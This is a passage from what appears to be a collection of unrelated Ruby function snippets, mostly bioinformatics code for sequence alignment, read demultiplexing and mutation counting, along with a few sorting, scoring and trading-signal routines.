point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def averages(grade_hash)\n grade_hash.transform_values { |marks| marks.inject {|sum, n| sum + n } / marks.length }\nend",
"def score_term word, year_hash, year\n min_norm_count = 0.000001\n curr_nc = 0.0\n prev_nc = 0.0\n (year-GROUPSIZE+1).upto(year) do |y|\n begin\n curr_nc += year_hash[y][word][:nc] || 0.0\n rescue\n curr_nc += 0.0\n end\n end\n (year-GROUPSIZE*2+1).upto(year-GROUPSIZE) do |y|\n begin\n prev_nc += year_hash[y][word][:nc] || 0.0\n rescue\n prev_nc += 0.0\n end\n end\n\n if prev_nc > 0.0\n growth = curr_nc / prev_nc\n else\n growth = 0.0\n end\n\n if growth > 1.0\n return growth\n else\n return 1.0\n end\nend",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def fitFiles(target)\n buckets()\n runningSize = 0\n fileSet = FileSet.new(target, @log, @DEBUG, @LOG_DEBUG)\n \n # Go thru each bucket...\n @sortedBuckets.each do |bkt|\n Utils.printMux(@log, \"Processing bucket '#{bkt}'\")\n\n # ... And each file in the bucket\n @data[bkt].each do |file| \n Utils.printMux(@log, \"\\tProcessing file '#{file}'\")\n\n # The regular call to size won't work with larger (> 2 GB) files in some versions of Ruby, so call the custom version added above.\n fsize = File.size_big(file)\n\n Utils.printMux(@log, \"\\t\\t fsize: #{fsize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"\\t\\trunningSize: #{runningSize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"\\t\\t target: #{target}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n\n\t\t\t # Sanity check the file size\n if (fsize < 0)\n Utils.printMux(@log, \"\\t\\t*** WARNING: fsize < 0 - skipping!\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n next\n end\n\n # Make sure this file won't push us over the limit\n if (fsize + runningSize) < target\n # take the first file in this bucket \n Utils.printMux(@log, \"\\t\\tAdding '#{file}' and removing from bucket\")\n fileSet.add(file, fsize)\n runningSize += fsize\n \n # Remove the file from the original list\n @data[bkt].delete(file)\n \n # See if we should remove the bucket, too\n if @data[bkt].size() == 0\n @data.delete(bkt)\n Utils.printMux(@log, \"Removed bucket '#{bkt}'\\n\")\n end\n else\n # Go to the next bucket and look at smaller files\n Utils.printMux(@log, \"\\t\\tDropping down to next bucket\\n\")\n break\n end\n\n # Give the CPU a bit of a break in between files\n sleep @sleepInterval\n end # iterate files\n\n # Give the CPU a bit of a break in between buckets\n sleep @sleepInterval\n end # iterate buckets\n \n # Save off the running size in the object\n @totalSize = runningSize\n \n # Save off the file set\n @fileSets << fileSet\n\n Utils.printMux(@log, \"totalSize: #{totalSize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"fileSets:\\n\" + @fileSets.pretty_inspect(), @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n\n return fileSet\n end",
"def runAnalyzer(num_samples,inhash)\n # select profile for run\n show do \n title \"Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}\" # this is just a profile name, should be ok for other polymerases\n note \"Click <b>Back to Wizard</b> if previous data is displayed.\"\n check \"Under <b>Process -> Process Profile</b>, make sure <b>#{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}</b> is selected.\"\n end\n \n # select alignment marker\n ref_marker = (inhash[:sampleTypes] == 'DNA') ? REF_MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] : REF_MARKERS[inhash[:type_ind] ]\n show do \n title \"Select alignment marker\"\n check \"Under <b>Marker</b>, in the <b>Reference Marker </b> drop-down, select <b>#{ref_marker}</b>. A green dot should appear to the right of the drop-down.\"\n end\n \n # empty rows\n if inhash[:sampleTypes] == 'RNA'\n num_samples = num_samples + 1 # Include the ladder in the first well of the first stripwell\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n (num_samples % WELLS_PER_STRIPWELL) > 0 ? nonempty_rows + 1 : nonempty_rows\n else\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n end\n show do \n title \"Deselect empty rows\"\n check \"Under <b>Sample selection</b>, deselect all rows but the first #{nonempty_rows}.\"\n end\n \n # check \n show do \n title \"Perform final check before running analysis\"\n note \"Under <b>Run Check</b>, manually confirm the following:\"\n check \"Selected rows contain samples.\"\n check \"Alignment marker is loaded (changed every few weeks).\"\n end\n \n # run and ask tech for remaining number of runs\n run_data = show do \n title \"Run analysis\"\n note \"If you can't click <b>Run</b>, and there is an error that reads <b>The pressure is too low. Replace the nitrogen cylinder or check the external nitrogen source</b>, close the software, and reopen it. Then restart at title - <b>Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]} </b>\"\n check \"Otherwise, click <b>Run</b>\"\n note \"Estimated time of experiment is given at the bottom of the screen\"\n get \"number\", var: \"runs_left\", label: \"Enter the number of <b>Remaining Runs</b> left in this cartridge\", default: 0\n #image \"frag_an_run\"\n end\n \n # return\n run_data[:runs_left]\n \n end",
"def gcThree #average gc 3 values for seqs\n freqs = Array.new\n self.codons.each{ | eachRow |\n gcCount = 0\n codonCount = 0\n eachRow.each{ |eachCodon |\n if ! (eachCodon.include?(\"N\") or eachCodon.include?(\"-\"))\n codonCount += 1\n if eachCodon[2,1] =~ /[GC]/\n gcCount += 1\n end\n end\n }\n\n if codonCount != 0\n freqs << gcCount.to_f / codonCount\n end\n }\n\n\n return freqs.sampleMean\n end",
"def compute\n index(@ref, @ref_base, @software)\n align(@ref, @ref_base, @software, {seedlen: @seedlen})\n end",
"def getFtsSequences\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n loc = \"c#{ft.locations[0].to_s}\" if ft.locations[0].strand == -1\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\nend",
"def fully_extend_all reps=nil\n dist.branches.times do |i|\n hits = mapee(i).hits\n len = mapee(i).length\n mapee(i).clear_hits\n reps = (@len.to_f / len).round if reps.nil?\n mapee(i).length = @len\n reps.times do |j|\n new_hits = HitSq.new\n new_hits << hits\n new_hits * (1.0/reps)\n new_hits + (j.to_f / reps)\n# puts new_hits.hits.inspect\n mapee(i) << new_hits\n end\n# puts mapee(i).hits.hits.inspect\n end\n end",
"def bam_get_cigar(b)\n b[:data] + b[:core][:l_qname]\n end",
"def calc_wps(o = {})\n max_distance = o[:max_distance] || MAX_DISTANCE\n w1 = @t1.w_cnt ; w2 = @t2.w_cnt \n @i = 0 ; @j = 0 ; g_score = []; w1_iso = 0 ; w2_iso = 0\n # Until we exhause occurrence of both terms\n # Always start with a new group (b_loc/b_term)\n begin\n while true\n #At this point, which term do we have and where?\n b_term , b_loc = get_term_loc(w1[@i] , w2[@j])\n #What is current term and where?\n c_term , c_loc = get_next_term_loc(b_term , w1 , w2)\n\n if( c_loc - b_loc > max_distance || b_term == c_term || !in_same_doc?(b_loc , c_loc) )\n #puts \"Moving on (#{b_term}::#{b_loc} -> #{c_term}::#{c_loc})\"\n if b_term == 1 then w1_iso += 1 else w2_iso += 1 end\n next\n end\n \n n_term , n_loc = get_next_term_loc(c_term , w1 , w2)\n # c_term - n_term group\n if n_term != c_term && n_loc - c_loc < c_loc - b_loc\n g_score << n_loc - c_loc \n #puts \"C3-1 G#(#{c_term}::#{c_loc} ~ #{n_term}::#{n_loc}) : #{g_score.last}\"\n nn_term , nn_loc = get_next_term_loc(n_term , w1 , w2)\n if c_term == 1 then w1_iso += 1 else w2_iso += 1 end\n else # b_term - c_term group\n g_score << c_loc - b_loc \n #puts \"C3-2 G#(#{b_term}::#{b_loc} ~ #{c_term}::#{c_loc}) : #{g_score.last}\"\n end\n end#while\n rescue IndexError\n #puts \"Process ended @ (#@i,#@j) / #{w1_iso} , #{w2_iso}\"\n end#begin\n g_score.inject(0){|sum,e| sum + 1.0 / e if e > 0} #) / Math.exp(w1_iso * w2_iso) \n end",
"def align\n i = @max_cell_row\n j = @max_cell_column\n @first_result = \"\" \n @second_result = \"\" \n gaps_in_first = 0 # count of gaps in each sequence\n gaps_in_second = 0\n\n while true\n\n # end local alignment at 0 cell\n if @traceback_matrix[i, j] == 0\n break\n end\n\n # match/mismatch\n if @traceback_matrix[i, j] == 1\n @first_result << @first_string[i-1]\n @second_result << @second_string[j-1]\n i -= 1\n j -= 1\n end\n\n # deletion -> gap in S1\n if @traceback_matrix[i, j] == 2\n @first_result << \"-\"\n @second_result << @second_string[j-1]\n j -= 1\n gaps_in_first += 1\n end\n\n # insertion -> gap in S2\n if @traceback_matrix[i, j] == 3\n @first_result << @first_string[i-1]\n @second_result << \"-\"\n i -= 1\n gaps_in_second += 1\n end\n\n end\n # set variables to make writing to file prettier\n set_variables(gaps_in_first, gaps_in_second)\n end",
"def before_results(controller_params)\n @num_seqs = 0\n\n resfile = File.join(job_dir, jobid+\".aln\")\n raise(\"ERROR with resultfile!\") if !File.readable?(resfile) || !File.exists?(resfile) || File.zero?(resfile)\n res = IO.readlines(resfile).map {|line| line.chomp}\n\n # get the header\n @header = res.shift\n\n #get the alignment blocks\n @aln_blocks = []\n block = []\n num = 0\n res.each do |line|\n if (line =~ /^\\s*$/)\n if (!block.empty?)\n @aln_blocks.push(block)\n block = []\n if (@num_seqs == 0) then @num_seqs = num end\n num = 0\n end\n next\n end\n\n if (line !~ /^\\s+/) then num += 1 end\n block.push(line)\n end\n\n if (!block.empty?)\n @aln_blocks.push(block)\n end\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def run_nCOP_given_alpha selected_alpha = $alpha\n # use the given alpha\n $alpha_range = ([] << selected_alpha.to_f.round(2))\n \n # set the rest of the params\n $NUM_AVG_ITER = 1000\n $run_alpha_range = false\n \n $all_avail_genes = deep_copy_hash $all_genes\n $all_avail_pat = deep_copy_hash $all_pat\n \n # randomly withhold 15% of the patients\n $HIDE_PERCENT = 0.15\n \n exec_range_alpha\n \n # write the genes sorted by their frequency\n puts \"Writing output to: #{$OUT_DIR}#{$cancer}_results.txt\"\n genes = sort_hash($selected_genes)\n fo = File.open(\"#{$OUT_DIR}#{$cancer}_results.txt\", 'w')\n genes.each { |e| fo.puts \"#{e.ljust(10)} #{($selected_genes[e].to_f*100/$NUM_AVG_ITER).round(1)}%\" }\n puts \"Done.\"\nend",
"def mean_sqr_err(expected)\n len = [length, expected.length].min\n sum = (0...len).reduce 0 do |sum, i|\n o = (self[i].ord - A) / 25.0\n e = (expected[i].ord - A) / 25.0\n sum + (o - e)**2\n end\n sum / len\n end",
"def bucket_sort\n buckets = {}\n #Ideal for known and uniformly distributed range. Sort age of employees for eg.:\n @array.each do |age|\n bucket = age/10\n buckets[bucket] ||= []\n buckets[bucket] << age\n end\n\n result = []\n for i in 0..20\n arr = buckets[i]\n puts \"i=#{i}, buckets[i]=#{arr}\"\n puts \"result=#{result}, sorted value=#{insertion_sort(arr)}\" if arr\n result << insertion_sort(arr) if arr && arr != []\n end\n @array = result.flatten\n end",
"def score(do_logging=false)\n # penalize really short or long phrases\n duration_penalty = case \n when duration >= 4 then 0\n when duration == 3 then -100\n when duration == 2 then -400\n when duration <= 1 then -800\n end\n duration_penalty += case \n when length >= 12 then -1*((length*4)**1.25)\n when (length >= 3 and length < 12) then 0\n when length == 2 then -150\n when length <= 1 then -400\n end\n total = duration_penalty\n\n # first penalize for the total distance\n total -= DIST_WEIGHT*total_distance\n\n # now add a premium for similarity to other phrases\n filtered_similarity = @phrase_similarity.select{ |x| x > 0.3 }\n if filtered_similarity.empty?\n similarity = 0.0\n mean_similarity = 0.0\n similarity_weight = 0\n else\n mean_similarity = filtered_similarity.inject(0.0){|s,x| s+x} / filtered_similarity.length.to_f\n similarity = (self.length**SIM_A) * (filtered_similarity.length**SIM_B) / (10.0**(SIM_C*mean_similarity)) \n similarity_weight = 2\n total += similarity_weight*similarity\n end\n\n # finally, subtract a penalty for being significantly different from the mean phrase length\n total -= DUR_DEV_WEIGHT*duration_deviance\n\n puts \"\\t\\tscore (#{sprintf(\"%2d\", @start_idx)}-#{sprintf(\"%2d\", @end_idx)}): #{sprintf(\"% 4d\", duration_penalty)} \" +\n \"- #{DIST_WEIGHT}*#{sprintf(\"%5.1f\", total_distance)} \" +\n \"+ #{similarity_weight}*((#{sprintf(\"%2d\", self.length)}^#{SIM_A.round})*(#{filtered_similarity.length}^#{SIM_B.round})\" + \n \"/(10.0^(#{SIM_C.round}*#{sprintf(\"%4.3f\", mean_similarity)}))) \" +\n \"- #{DUR_DEV_WEIGHT}*#{sprintf(\"%5.3f\", duration_deviance)} \" +\n \"= #{sprintf(\"% 4d\", duration_penalty)} \" +\n \"- #{sprintf(\"% 6.1f\", DIST_WEIGHT*total_distance)} \" +\n \"+ #{sprintf(\"% 7.3f\", similarity_weight*similarity)} \" +\n \"- #{sprintf(\"% 6.1f\", DUR_DEV_WEIGHT*duration_deviance)} \" +\n \"= #{sprintf(\"% 6.1f\", total)}\" if do_logging\n\n return total\n end",
"def test_alignment_works_in_single_thread\n assert_nothing_raised(\"Can't handle single threaded scenario\") do\n SEQUENCE_GROUPS[0..10].each do |sequence_group|\n align_group(sequence_group)\n end\n end\n end",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def finalscore(h,flattenarray,originalarray)\r\n # puts \"==>> #{originalarray}\"\r\n max_index = originalarray.each_index.max_by { |i| originalarray[i].size }\r\n # puts \"max index = #{max_index}\"\r\n # puts \"abcscs = #{originalarray[max_index].length}\"\r\n maxsize = originalarray[max_index].length+1\r\n min_index = originalarray.each_index.min_by { |i| originalarray[i].size }\r\n minsize = originalarray[min_index].length+1\r\n frequency = flattenarray.length\r\n # puts \"***** max= #{maxsize} min = #{minsize} f= #{frequency}\"\r\n h.each do |key,value|\r\n # if key == \"B00APE06UA\"\r\n # puts \"value = #{value }\"\r\n # puts \"value[0] = #{value[0] }\"\r\n # puts \"value[1] = #{value[1]}== #{(value[1]-minsize+1)}/#{(maxsize-minsize)}\"\r\n # puts \"value[0] = #{value[0]} == #{value[0].clone}/#{frequency}\"\r\n # end\r\n\r\n # value[0]= 10000*value[0]/frequency\r\n # value[1]= 100*(value[1]-minsize+1)/(maxsize-minsize)\r\n value [1] = 10000*( value[1]/value[0])\r\n # if key ==\"B00APE06UA\"\r\n # puts \"value [1] = #{value[1]}\"\r\n # puts \" ==>>>> #{value[0]} =========#{value[1]} #{(value[1]-minsize+1)}/#{(maxsize-minsize)} \"\r\n # end\r\n total_score = value[0]+value[1]\r\n # puts\" #{total_score}\"\r\n h[key] = total_score\r\n end\r\n return h\r\nend",
"def run\n calculate_ideal_subject_distribution\n\n #p \"population size >>>>>> \" + @population_size.to_s\n #p \"max generations >>>>>> \" + @max_generation.to_s\n\n result = {}\n best_chromosomes = []\n generate_initial_population #Generate initial population \n @max_generation.times do |g|\n\n selected_to_breed = selection #Evaluates current population \n\n offsprings = reproduction selected_to_breed #Generate the population for this new generation\n\n replace_worst_ranked offsprings\n\n #Sort the chromosomes again by fitness after offsprings\n #being merged\n @population.sort! { |a, b| b.fitness <=> a.fitness}\n\n # fs = @population.collect {|x| x.fitness }\n # File.open(\"fitnesses.txt\", \"a\") do |f|\n # f.puts \"generation (#{fs.size}) #{g.to_s} = \" + fs.join(\", \")\n # end\n\n best_chromosomes << @population[0]\n end\n result[:chromosomes] = best_chromosomes\n result[:population_size] = @population_size\n result[:generations] = @max_generation\n return result\n end",
"def compute_buckets(accumulated_distances, points, precision, &block)\n paired_distances_and_points = accumulated_distances.zip(points)\n # hash time points in the same distance buckets with a precision of one fractional digit\n intervals = {}\n paired_distances_and_points.each do |(distance_m, point)|\n distance_km = distance_m / 1000.to_f\n intervals[distance_km.round(precision)] ||= []\n intervals[distance_km.round(precision)] << [distance_m, point.time]\n end\n\n buckets = {}\n begin\n intervals.each do |key, a_list|\n first_distance_m, first_time = a_list.first\n second_distance_m, second_time = a_list.last\n dx_m = second_distance_m - first_distance_m\n dt_seconds = second_time - first_time\n value = block.call dx_m, dt_seconds\n buckets[key] = value if !value.nil? #ignore nil values\n raise 'Error' if !value.nil? && !(value < Float::INFINITY)\n end\n rescue => e\n raise e #TODO: remove this line\n buckets = Hash.new\n end\n buckets\n end",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def calculate (bs, ap, buffer)\r\n\t\tpair_key = \"#{bs}-#{ap}\"\r\n\t\t@price_histogram[pair_key] = {} if !@price_histogram[pair_key]\r\n\t\t@price_histogram_topx[pair_key] = [] if !@price_histogram_topx[pair_key]\r\n\t\t\r\n\t # age histograms\r\n\t @price_histogram[pair_key].each do |k,v|\r\n\t \t@price_histogram[pair_key][k] = v * ap\r\n\t end\r\n\t # age histograms in top10 list\r\n\t @price_histogram_topx[pair_key].each do |t|\r\n\t \tt[1] = t[1] * ap\r\n\t end\r\n\t \t\r\n\t # calculate which bucket in the histogram the price belongs to\r\n\t bucket = (buffer[P].close / bs).to_i * bs\r\n\t # increase the bucket counter\r\n\t @price_histogram[pair_key][bucket] = (@price_histogram[pair_key][bucket] ? @price_histogram[pair_key][bucket] : 0) + 1\r\n\t\t# if the bucket belongs to the top10 list, increase the counter there too\r\n\t\tcorrected = false\r\n\t\t@price_histogram_topx[pair_key].each do |t|\r\n\t\t\tif t[0] == bucket\r\n\t\t\t\tt[1] = @price_histogram[pair_key][bucket]\r\n\t\t\t\tcorrected = true\r\n\t\t\t\tbreak\r\n\t\t\tend\r\n\t\tend\r\n\t\t\r\n\t\t# add the bucket to the top 10 (if we haven't increased an existing one)\r\n\t\tif !corrected\r\n\t\t\t@price_histogram_topx[pair_key].push([bucket,@price_histogram[pair_key][bucket]])\r\n\t\tend\r\n\t\t# re-sort the top10 prices by counter\r\n\t\t@price_histogram_topx[pair_key] = @price_histogram_topx[pair_key].sort_by { |k| -1 * k[1] }\r\n\t\t# chop off the last element to keep top10 array at the right length\r\n\t\tif @price_histogram_topx[pair_key].count > 10\r\n\t\t\t@price_histogram_topx[pair_key].pop\r\n\t\tend\r\n\t\t\r\n\t\t# is there a signal? compare current & previous bucket...\r\n\t\tbucket_current = (buffer[P].close / bs).to_i * bs\r\n\t\tbucket_previous = (buffer[P-1].close / bs).to_i * bs\r\n\t\t# ... if exiting a top10 bucket and entering a regular one - we have a signal!\r\n\t\tif bucket_current != bucket_previous && @price_histogram_topx[pair_key].map{ |t| t[0] }.include?(bucket_previous) && !@price_histogram_topx[pair_key].map{ |t| t[0] }.include?(bucket_current)\r\n\t\t\tif bucket_current > bucket_previous\r\n\t\t\t\treturn \"b\"\r\n\t\t\telse\r\n\t\t\t\treturn \"s\"\r\n\t\t\tend\r\n\t\telse\r\n\t\t\treturn \"h\"\r\n\t\tend\r\n\tend",
